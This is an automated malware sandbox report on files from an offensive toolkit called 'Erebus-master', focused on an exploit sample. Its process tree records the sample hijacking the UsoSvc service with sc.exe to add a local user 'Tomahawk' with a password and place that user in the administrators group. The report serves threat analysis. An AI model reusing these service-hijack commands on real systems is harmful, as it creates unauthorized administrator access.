Overview
overview
8Static
static
7Erebus-mas...03.exe
windows7-x64
5Erebus-mas...03.exe
windows10-2004-x64
5Erebus-mas...64.dll
windows7-x64
1Erebus-mas...64.dll
windows10-2004-x64
1Erebus-mas...86.dll
windows7-x64
3Erebus-mas...86.dll
windows10-2004-x64
3Erebus-mas...64.exe
windows7-x64
1Erebus-mas...64.exe
windows10-2004-x64
1Erebus-mas...86.exe
windows7-x64
1Erebus-mas...86.exe
windows10-2004-x64
3Erebus-mas...64.exe
windows7-x64
8Erebus-mas...64.exe
windows10-2004-x64
8Erebus-mas...jp.exe
windows7-x64
1Erebus-mas...jp.exe
windows10-2004-x64
1Erebus-mas...sp.exe
windows7-x64
1Erebus-mas...sp.exe
windows10-2004-x64
1Erebus-mas...80.exe
windows7-x64
7Erebus-mas...80.exe
windows10-2004-x64
7Erebus-mas...es.exe
windows7-x64
7Erebus-mas...es.exe
windows10-2004-x64
7Erebus-mas...b.xlsx
windows7-x64
3Erebus-mas...b.xlsx
windows10-2004-x64
1Erebus-mas...ter.py
ubuntu-18.04-amd64
3Erebus-mas...ter.py
debian-9-armhf
3Erebus-mas...ter.py
debian-9-mips
3Erebus-mas...ter.py
debian-9-mipsel
3Erebus-mas...er.ps1
windows7-x64
3Erebus-mas...er.ps1
windows10-2004-x64
3Erebus-mas...to.exe
windows7-x64
1Erebus-mas...to.exe
windows10-2004-x64
1Erebus-mas...le.exe
windows7-x64
1Erebus-mas...le.exe
windows10-2004-x64
1Analysis
-
max time kernel
92s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2024 06:57
Behavioral task
behavioral1
Sample
Erebus-master/exp/0803.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Erebus-master/exp/0803.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Erebus-master/exp/16075/x64.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Erebus-master/exp/16075/x64.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Erebus-master/exp/16075/x86.dll
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Erebus-master/exp/16075/x86.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Erebus-master/exp/8120/x64.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Erebus-master/exp/8120/x64.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Erebus-master/exp/8120/x86.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Erebus-master/exp/8120/x86.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Erebus-master/exp/com/1405_1322_x64.exe
Resource
win7-20241023-en
Behavioral task
behavioral12
Sample
Erebus-master/exp/com/1405_1322_x64.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
Erebus-master/exp/jp/jp.exe
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
Erebus-master/exp/jp/jp.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
Erebus-master/exp/sp/sp.exe
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
Erebus-master/exp/sp/sp.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
Erebus-master/gather/chrome80.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
Erebus-master/gather/chrome80.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
Erebus-master/gather/cookies.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
Erebus-master/gather/cookies.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
Erebus-master/local/2020-04-10-mssb.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
Erebus-master/local/2020-04-10-mssb.xlsx
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
Erebus-master/local/windows-exploit-suggester.py
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral24
Sample
Erebus-master/local/windows-exploit-suggester.py
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral25
Sample
Erebus-master/local/windows-exploit-suggester.py
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral26
Sample
Erebus-master/local/windows-exploit-suggester.py
Resource
debian9-mipsel-20240226-en
Behavioral task
behavioral27
Sample
Erebus-master/modules/gather.ps1
Resource
win7-20241023-en
Behavioral task
behavioral28
Sample
Erebus-master/modules/gather.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
Erebus-master/post/BadPotato.exe
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
Erebus-master/post/BadPotato.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
Erebus-master/post/HiveJack-Console.exe
Resource
win7-20240708-en
Behavioral task
behavioral32
Sample
Erebus-master/post/HiveJack-Console.exe
Resource
win10v2004-20241007-en
General
-
Target
Erebus-master/exp/com/1405_1322_x64.exe
-
Size
132KB
-
MD5
2e2ddfd6d3a10d5dd51f8cbdeaeb4b75
-
SHA1
bf51231e74fe5ce86e612e8bec16bc555afb7d73
-
SHA256
85bd47cc708f80a3e9aebc5948404017053eec1c316f2c3b527011f19597ab1f
-
SHA512
ec9f48e571982954e98ecb76156c8c619a67c7c6dc75c3d1319ddd8fca992f4a47e86d0735882320ef4bc8ebca39c763f18e19981b7d50bb4c7db1563de90c25
-
SSDEEP
3072:0Ud3B51Sbph2PlpHyKE+LrmeTwMJV4NalCD:0Ix51SFA95yKEUxz
Malware Config
Signatures
-
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 4980 sc.exe 4516 sc.exe 1668 sc.exe 4968 sc.exe 3536 sc.exe 3424 sc.exe 1104 sc.exe 4276 sc.exe 3128 sc.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Modifies data under HKEY_USERS 9 IoCs
Processes:
upnpcont.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ upnpcont.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" upnpcont.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 3cde0e7ad218db01 upnpcont.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage upnpcont.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 6ea9a09c5045db01 upnpcont.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" upnpcont.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" upnpcont.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" upnpcont.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings upnpcont.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
upnpcont.exedescription pid Process procid_target PID 3964 wrote to memory of 1104 3964 upnpcont.exe 84 PID 3964 wrote to memory of 1104 3964 upnpcont.exe 84 PID 3964 wrote to memory of 1668 3964 upnpcont.exe 86 PID 3964 wrote to memory of 1668 3964 upnpcont.exe 86 PID 3964 wrote to memory of 4968 3964 upnpcont.exe 88 PID 3964 wrote to memory of 4968 3964 upnpcont.exe 88 PID 3964 wrote to memory of 3536 3964 upnpcont.exe 90 PID 3964 wrote to memory of 3536 3964 upnpcont.exe 90 PID 3964 wrote to memory of 4276 3964 upnpcont.exe 94 PID 3964 wrote to memory of 4276 3964 upnpcont.exe 94 PID 3964 wrote to memory of 3424 3964 upnpcont.exe 98 PID 3964 wrote to memory of 3424 3964 upnpcont.exe 98 PID 3964 wrote to memory of 3128 3964 upnpcont.exe 101 PID 3964 wrote to memory of 3128 3964 upnpcont.exe 101 PID 3964 wrote to memory of 4980 3964 upnpcont.exe 105 PID 3964 wrote to memory of 4980 3964 upnpcont.exe 105 PID 3964 wrote to memory of 4516 3964 upnpcont.exe 107 PID 3964 wrote to memory of 4516 3964 upnpcont.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\Erebus-master\exp\com\1405_1322_x64.exe"C:\Users\Admin\AppData\Local\Temp\Erebus-master\exp\com\1405_1322_x64.exe"1⤵PID:1696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵PID:3300
-
C:\Windows\system32\upnpcont.exeC:\Windows\system32\upnpcont.exe -Embedding1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop UsoSvc2⤵
- Launches sc.exe
PID:1104
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config UsoSvc binpath= "cmd.exe /c net user /add Tomahawk RibSt3ak69 &"2⤵
- Launches sc.exe
PID:1668
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" start UsoSvc2⤵
- Launches sc.exe
PID:4968
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop UsoSvc2⤵
- Launches sc.exe
PID:3536
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config UsoSvc binpath= "cmd.exe /c net localgroup administrators /add Tomahawk & "2⤵
- Launches sc.exe
PID:4276
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" start UsoSvc2⤵
- Launches sc.exe
PID:3424
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop UsoSvc2⤵
- Launches sc.exe
PID:3128
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config UsoSvc binpath= "C:\WINDOWS\system32\svchost.exe - k netsvcs - p"2⤵
- Launches sc.exe
PID:4980
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" start UsoSvc2⤵
- Launches sc.exe
PID:4516
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
24KB
MD5d0e162c0bd0629323ebb1ed88df890d6
SHA1cf3fd2652cdb6ff86d1df215977454390ed4d7bc
SHA2563e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744
SHA512a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117